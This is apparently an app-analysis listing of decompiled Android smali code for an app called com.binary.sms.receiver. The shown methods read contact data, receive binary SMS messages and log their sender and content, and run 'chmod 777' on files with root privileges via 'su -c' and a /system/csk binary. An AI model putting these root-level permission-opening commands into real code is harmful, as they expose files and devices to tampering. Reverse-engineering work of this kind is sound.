    171invoke-virtual {v1}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    172move-result-object v5
    174invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    175move-result-object v4
    177invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    178move-result-object v4
    180invoke-static {v4, v1}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    181goto/16 :goto_c7
    182try_start_f8:
    183const-string v0, "/sdcard/dataCopy/"
    184try_end_fa: goto/16 :goto_7d
    APIs
    • android.app.Activity.onActivityResult
    • android.content.Intent.getData
    • com.binary.sms.receiver.SkeletonActivity.getContentResolver
    • android.content.ContentResolver.query
    • android.database.Cursor.moveToFirst
    • android.database.Cursor.getColumnIndex
    • android.database.Cursor.getString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • android.util.Log.i
    • android.database.Cursor.getColumnIndex
    • android.database.Cursor.getString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • android.util.Log.i
    • android.database.Cursor.getColumnIndex
    • android.database.Cursor.getString
    • java.lang.Integer.parseInt
    • com.binary.sms.receiver.SkeletonActivity.getContentResolver
    • android.provider.ContactsContract$CommonDataKinds$Phone.CONTENT_URI:Landroid/net/Uri
    • android.content.ContentResolver.query
    • android.database.Cursor.moveToNext
    • android.database.Cursor.getColumnIndex
    • android.database.Cursor.getString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • android.util.Log.i
    • com.binary.sms.receiver.SkeletonActivity.phoneNumber:Landroid/widget/EditText
    • android.widget.EditText.setText
    • android.database.Cursor.close
    • android.database.Cursor.close
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • android.util.Log.e
    Strings
    • display_name
    • MyWap
    • onActivityResult name:
    • _id
    • onActivityResult contactId:
    • has_phone_number
    • contact_id = ?
    • data1
    • onActivityResult contactPhoneNumber :
    • , name:
    • onActivityResult exception:
    Position Instruction Meta Information
    0.param p1, "reqCode" # I
    1.param p2, "resultCode" # I
    2.param p3, "data" # Landroid/content/Intent;
    3.prologue
    4try_start_0:
    5invoke-super/range {p0 .. p3}, Landroid/app/Activity;->onActivityResult(IILandroid/content/Intent;)V
    6packed-switch p1, :pswitch_data_da
    7goto_6: return-void
    8pswitch_7: const/4 v1, -0x1
    9move/from16 v0, p2
    10if-ne v0, v1, :cond_6
    12invoke-virtual/range {p3 .. p3}, Landroid/content/Intent;->getData()Landroid/net/Uri;
    13move-result-object v2
    15invoke-virtual {p0}, Lcom/binary/sms/receiver/SkeletonActivity;->getContentResolver()Landroid/content/ContentResolver;
    16move-result-object v1
    17const/4 v3, 0x0
    18const/4 v4, 0x0
    19const/4 v5, 0x0
    20const/4 v6, 0x0
    22invoke-virtual/range {v1 .. v6}, Landroid/content/ContentResolver;->query(Landroid/net/Uri;[Ljava/lang/String;Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;)Landroid/database/Cursor;
    23move-result-object v10
    25invoke-interface {v10}, Landroid/database/Cursor;->moveToFirst()Z
    26move-result v1
    27if-eqz v1, :cond_ba
    29const-string v1, "display_name"
    31invoke-interface {v10, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
    32move-result v1
    34invoke-interface {v10, v1}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
    35move-result-object v12
    37const-string v1, "MyWap"
    38new-instance v3, Ljava/lang/StringBuilder;
    40const-string v4, "onActivityResult name: "
    42invoke-direct {v3, v4}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    44invoke-virtual {v3, v12}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    45move-result-object v3
    47invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    48move-result-object v3
    50invoke-static {v1, v3}, Landroid/util/Log;->i(Ljava/lang/String;Ljava/lang/String;)I
    52const-string v1, "_id"
    54invoke-interface {v10, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
    55move-result v1
    57invoke-interface {v10, v1}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
    58move-result-object v9
    60const-string v1, "MyWap"
    61new-instance v3, Ljava/lang/StringBuilder;
    63const-string v4, "onActivityResult contactId: "
    65invoke-direct {v3, v4}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    67invoke-virtual {v3, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    68move-result-object v3
    70invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    71move-result-object v3
    73invoke-static {v1, v3}, Landroid/util/Log;->i(Ljava/lang/String;Ljava/lang/String;)I
    75const-string v1, "has_phone_number"
    77invoke-interface {v10, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
    78move-result v1
    80invoke-interface {v10, v1}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
    81move-result-object v1
    83invoke-static {v1}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I
    84move-result v1
    85if-lez v1, :cond_ba
    87invoke-virtual {p0}, Lcom/binary/sms/receiver/SkeletonActivity;->getContentResolver()Landroid/content/ContentResolver;
    88move-result-object v3
    90sget-object v4, Landroid/provider/ContactsContract$CommonDataKinds$Phone;->CONTENT_URI:Landroid/net/Uri;
    91const/4 v5, 0x0
    93const-string v6, "contact_id = ?"
    94const/4 v1, 0x1
    95new-array v7, v1, [Ljava/lang/String;
    96const/4 v1, 0x0
    97aput-object v9, v7, v1
    98const/4 v8, 0x0
    100invoke-virtual/range {v3 .. v8}, Landroid/content/ContentResolver;->query(Landroid/net/Uri;[Ljava/lang/String;Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;)Landroid/database/Cursor;
    101move-result-object v14
    103invoke-interface {v14}, Landroid/database/Cursor;->moveToNext()Z
    104move-result v1
    105if-eqz v1, :cond_b7
    107const-string v1, "data1"
    109invoke-interface {v14, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
    110move-result v1
    112invoke-interface {v14, v1}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
    113move-result-object v13
    115const-string v1, "MyWap"
    116new-instance v3, Ljava/lang/StringBuilder;
    118const-string v4, "onActivityResult contactPhoneNumber :"
    120invoke-direct {v3, v4}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    122invoke-virtual {v3, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    123move-result-object v3
    125const-string v4, ", name: "
    127invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    128move-result-object v3
    130invoke-virtual {v3, v12}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    131move-result-object v3
    133invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    134move-result-object v3
    136invoke-static {v1, v3}, Landroid/util/Log;->i(Ljava/lang/String;Ljava/lang/String;)I
    137if-eqz v13, :cond_b7
    139iget-object v1, p0, Lcom/binary/sms/receiver/SkeletonActivity;->phoneNumber:Landroid/widget/EditText;
    141invoke-virtual {v1, v13}, Landroid/widget/EditText;->setText(Ljava/lang/CharSequence;)V
    142cond_b7:
    143invoke-interface {v14}, Landroid/database/Cursor;->close()V
    144cond_ba:
    145invoke-interface {v10}, Landroid/database/Cursor;->close()V
    146try_end_bd: goto/16 :goto_6
    147catch_bf: move-exception v11
    149const-string v1, "MyWap"
    150new-instance v3, Ljava/lang/StringBuilder;
    152const-string v4, "onActivityResult exception:"
    154invoke-direct {v3, v4}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    156invoke-virtual {v11}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    157move-result-object v4
    159invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    160move-result-object v3
    162invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    163move-result-object v3
    165invoke-static {v1, v3, v11}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;Ljava/lang/Throwable;)I
    166goto/16 :goto_6
    Cross References
    APIs
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Runtime.getRuntime
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Runtime.exec
    • java.lang.Process.waitFor
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Process.destroy
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Process.destroy
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Process.destroy
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • filePath-
    • :
    • chmod 777
    • command:
    • su -c
    • result:
    • process:
    • process.destroy
    Position Instruction Meta Information
    0.param p1, "filePath" # Ljava/lang/String;
    1.prologue
    2const/4 v3, 0x0
    3const/4 v0, 0x0
    4try_start_2: iget v5, p0, Lcom/binary/sms/receiver/SkeletonActivity;->counter:I
    5add-int/lit8 v5, v5, 0x1
    6iput v5, p0, Lcom/binary/sms/receiver/SkeletonActivity;->counter:I
    7new-instance v5, Ljava/lang/StringBuilder;
    9const-string v6, "filePath-"
    11invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    12iget v6, p0, Lcom/binary/sms/receiver/SkeletonActivity;->counter:I
    14invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
    15move-result-object v5
    17const-string v6, ": "
    19invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    20move-result-object v5
    22invoke-virtual {v5, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    23move-result-object v5
    25invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    26move-result-object v5
    28invoke-static {v5}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    29new-instance v5, Ljava/lang/StringBuilder;
    31const-string v6, "chmod 777 "
    33invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    35invoke-virtual {v5, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    36move-result-object v5
    38invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    39move-result-object v1
    40new-instance v5, Ljava/lang/StringBuilder;
    42const-string v6, "command: "
    44invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    46invoke-virtual {v5, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    47move-result-object v5
    49invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    50move-result-object v5
    52invoke-static {v5}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    54invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
    55move-result-object v5
    56new-instance v6, Ljava/lang/StringBuilder;
    58const-string v7, "su -c "
    60invoke-direct {v6, v7}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    62invoke-virtual {v6, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    63move-result-object v6
    65invoke-virtual {v6}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    66move-result-object v6
    68invoke-virtual {v5, v6}, Ljava/lang/Runtime;->exec(Ljava/lang/String;)Ljava/lang/Process;
    69move-result-object v3
    71invoke-virtual {v3}, Ljava/lang/Process;->waitFor()I
    72move-result v4
    73new-instance v5, Ljava/lang/StringBuilder;
    75const-string v6, "result: "
    77invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    79invoke-virtual {v5, v4}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
    80move-result-object v5
    82invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    83move-result-object v5
    85invoke-static {v5}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    86try_start_74:
    87invoke-virtual {v3}, Ljava/lang/Process;->destroy()V
    88goto_77: return-void
    89catch_78: move-exception v2
    90try_start_79: new-instance v5, Ljava/lang/StringBuilder;
    92const-string v6, "process: "
    94invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    96invoke-virtual {v2}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    97move-result-object v6
    99invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    100move-result-object v5
    102invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    103move-result-object v5
    105invoke-static {v5, v2}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    106try_end_8f:
    107invoke-virtual {v3}, Ljava/lang/Process;->destroy()V
    108try_end_92: goto/16 :goto_77
    109catch_93: move-exception v2
    110new-instance v5, Ljava/lang/StringBuilder;
    112const-string v6, "process.destroy"
    114invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    116invoke-virtual {v2}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    117move-result-object v6
    119invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    120move-result-object v5
    122invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    123move-result-object v5
    125invoke-static {v5, v2}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    126goto/16 :goto_77
    127catchall_ab: move-exception v5
    128try_start_ac:
    129invoke-virtual {v3}, Ljava/lang/Process;->destroy()V
    130try_end_af: throw v5
    131catch_b0: move-exception v2
    132new-instance v6, Ljava/lang/StringBuilder;
    134const-string v7, "process.destroy"
    136invoke-direct {v6, v7}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    138invoke-virtual {v2}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    139move-result-object v7
    141invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    142move-result-object v6
    144invoke-virtual {v6}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    145move-result-object v6
    147invoke-static {v6, v2}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    148goto/16 :goto_af
    149catch_c8: move-exception v2
    150new-instance v5, Ljava/lang/StringBuilder;
    152const-string v6, "process.destroy"
    154invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    156invoke-virtual {v2}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    157move-result-object v6
    159invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    160move-result-object v5
    162invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    163move-result-object v5
    165invoke-static {v5, v2}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    166goto/16 :goto_77
    Cross References
    APIs
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Runtime.getRuntime
    • java.lang.Runtime.exec
    • java.lang.Process.waitFor
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Process.destroy
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Process.destroy
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Process.destroy
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • filePath-
    • :
    • export LD_LIBRARY_PATH=/vendor/lib:/system/lib; chmod 777
    • command:
    • /system/csk
    • result:
    • process:
    • process.destroy
    Position Instruction Meta Information
    0.param p1, "filePath" # Ljava/lang/String;
    1.prologue
    2const/4 v3, 0x0
    3const/4 v0, 0x0
    4try_start_2: iget v5, p0, Lcom/binary/sms/receiver/SkeletonActivity;->counter:I
    5add-int/lit8 v5, v5, 0x1
    6iput v5, p0, Lcom/binary/sms/receiver/SkeletonActivity;->counter:I
    7new-instance v5, Ljava/lang/StringBuilder;
    9const-string v6, "filePath-"
    11invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    12iget v6, p0, Lcom/binary/sms/receiver/SkeletonActivity;->counter:I
    14invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
    15move-result-object v5
    17const-string v6, ": "
    19invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    20move-result-object v5
    22invoke-virtual {v5, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    23move-result-object v5
    25invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    26move-result-object v5
    28invoke-static {v5}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    29new-instance v5, Ljava/lang/StringBuilder;
    31const-string v6, "export LD_LIBRARY_PATH=/vendor/lib:/system/lib; chmod 777 "
    33invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    35invoke-virtual {v5, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    36move-result-object v5
    38invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    39move-result-object v1
    40new-instance v5, Ljava/lang/StringBuilder;
    42const-string v6, "command: "
    44invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    46invoke-virtual {v5, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    47move-result-object v5
    49invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    50move-result-object v5
    52invoke-static {v5}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    54invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
    55move-result-object v5
    56const/4 v6, 0x2
    57new-array v6, v6, [Ljava/lang/String;
    58const/4 v7, 0x0
    60const-string v8, "/system/csk"
    61aput-object v8, v6, v7
    62const/4 v7, 0x1
    63aput-object v1, v6, v7
    65invoke-virtual {v5, v6}, Ljava/lang/Runtime;->exec([Ljava/lang/String;)Ljava/lang/Process;
    66move-result-object v3
    68invoke-virtual {v3}, Ljava/lang/Process;->waitFor()I
    69move-result v4
    70new-instance v5, Ljava/lang/StringBuilder;
    72const-string v6, "result: "
    74invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    76invoke-virtual {v5, v4}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
    77move-result-object v5
    79invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    80move-result-object v5
    82invoke-static {v5}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    83try_start_70:
    84invoke-virtual {v3}, Ljava/lang/Process;->destroy()V
    85goto_73: return-void
    86catch_74: move-exception v2
    87try_start_75: new-instance v5, Ljava/lang/StringBuilder;
    89const-string v6, "process: "
    91invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    93invoke-virtual {v2}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    94move-result-object v6
    96invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    97move-result-object v5
    99invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    100move-result-object v5
    102invoke-static {v5, v2}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    103try_end_8b:
    104invoke-virtual {v3}, Ljava/lang/Process;->destroy()V
    105try_end_8e: goto/16 :goto_73
    106catch_8f: move-exception v2
    107new-instance v5, Ljava/lang/StringBuilder;
    109const-string v6, "process.destroy"
    111invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    113invoke-virtual {v2}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    114move-result-object v6
    116invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    117move-result-object v5
    119invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    120move-result-object v5
    122invoke-static {v5, v2}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    123goto/16 :goto_73
    124catchall_a7: move-exception v5
    125try_start_a8:
    126invoke-virtual {v3}, Ljava/lang/Process;->destroy()V
    127goto_ab: throw v5
    128catch_ac: move-exception v2
    129new-instance v6, Ljava/lang/StringBuilder;
    131const-string v7, "process.destroy"
    133invoke-direct {v6, v7}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    135invoke-virtual {v2}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    136move-result-object v7
    138invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    139move-result-object v6
    141invoke-virtual {v6}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    142move-result-object v6
    144invoke-static {v6, v2}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    145goto/16 :goto_ab
    146catch_c4: move-exception v2
    147new-instance v5, Ljava/lang/StringBuilder;
    149const-string v6, "process.destroy"
    151invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    153invoke-virtual {v2}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    154move-result-object v6
    156invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    157move-result-object v5
    159invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    160move-result-object v5
    162invoke-static {v5, v2}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    163goto/16 :goto_73
    APIs
    • android.content.Intent.getAction
    • java.lang.String.equals
    • android.content.Intent.getExtras
    • android.os.Bundle.get
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.util.Date.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • android.telephony.SmsMessage.createFromPdu
    • android.telephony.SmsMessage.getOriginatingAddress
    • java.lang.String.valueOf
    • java.lang.StringBuilder.<init>
    • android.telephony.SmsMessage.getUserData
    • java.lang.String.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.Throwable.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • android.intent.action.DATA_SMS_RECEIVED
    • pdus
    • pdus.length:
    • Binary SMS at:
    • From number:
    • Data:\n
    • utf8
    • onReceive Exception-
    Position Instruction Meta Information
    0.prologue
    1try_start_0:
    2iget-object v8, p0, Lcom/binary/sms/receiver/SmsReceiver$1;->val$constIntent:Landroid/content/Intent;
    4invoke-virtual {v8}, Landroid/content/Intent;->getAction()Ljava/lang/String;
    5move-result-object v0
    7const-string v8, "android.intent.action.DATA_SMS_RECEIVED"
    9invoke-virtual {v0, v8}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
    10move-result v8
    11if-eqz v8, :cond_88
    13const-string v8, "android.intent.action.DATA_SMS_RECEIVED"
    14const/4 v9, 0x0
    16invoke-static {v8, v9}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;Z)V
    18iget-object v8, p0, Lcom/binary/sms/receiver/SmsReceiver$1;->val$constIntent:Landroid/content/Intent;
    20invoke-virtual {v8}, Landroid/content/Intent;->getExtras()Landroid/os/Bundle;
    21move-result-object v2
    22if-eqz v2, :cond_88
    24const-string v8, "pdus"
    26invoke-virtual {v2, v8}, Landroid/os/Bundle;->get(Ljava/lang/String;)Ljava/lang/Object;
    27move-result-object v6
    28check-cast v6, [Ljava/lang/Object;
    29array-length v8, v6
    30const/4 v9, -0x1
    31if-le v8, v9, :cond_88
    32array-length v8, v6
    33new-array v5, v8, [Landroid/telephony/SmsMessage;
    34new-instance v8, Ljava/lang/StringBuilder;
    36const-string v9, "pdus.length: "
    38invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    39array-length v9, v6
    41invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
    42move-result-object v8
    44invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    45move-result-object v8
    46const/4 v9, 0x0
    48invoke-static {v8, v9}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;Z)V
    50const-string v1, ""
    52const-string v7, ""
    53const/4 v4, 0x0
    54goto_44: array-length v8, v5
    55if-lt v4, v8, :cond_89
    57invoke-static {}, Lcom/binary/sms/receiver/Logger;->addLine()V
    58new-instance v8, Ljava/lang/StringBuilder;
    60const-string v9, "Binary SMS at: "
    62invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    63new-instance v9, Ljava/util/Date;
    65invoke-direct {v9}, Ljava/util/Date;-><init>()V
    67invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
    68move-result-object v8
    70invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    71move-result-object v8
    72const/4 v9, 0x1
    74invoke-static {v8, v9}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;Z)V
    75new-instance v8, Ljava/lang/StringBuilder;
    77const-string v9, "From number: "
    79invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    81invoke-virtual {v8, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    82move-result-object v8
    84invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    85move-result-object v8
    86const/4 v9, 0x1
    88invoke-static {v8, v9}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;Z)V
    89new-instance v8, Ljava/lang/StringBuilder;
    91const-string v9, "Data:\n"
    93invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    95invoke-virtual {v8, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    96move-result-object v8
    98invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    99move-result-object v8
    100const/4 v9, 0x1
    102invoke-static {v8, v9}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;Z)V
    103goto_88: return-void
    104cond_89: aget-object v8, v6, v4
    105check-cast v8, [B
    107invoke-static {v8}, Landroid/telephony/SmsMessage;->createFromPdu([B)Landroid/telephony/SmsMessage;
    108move-result-object v8
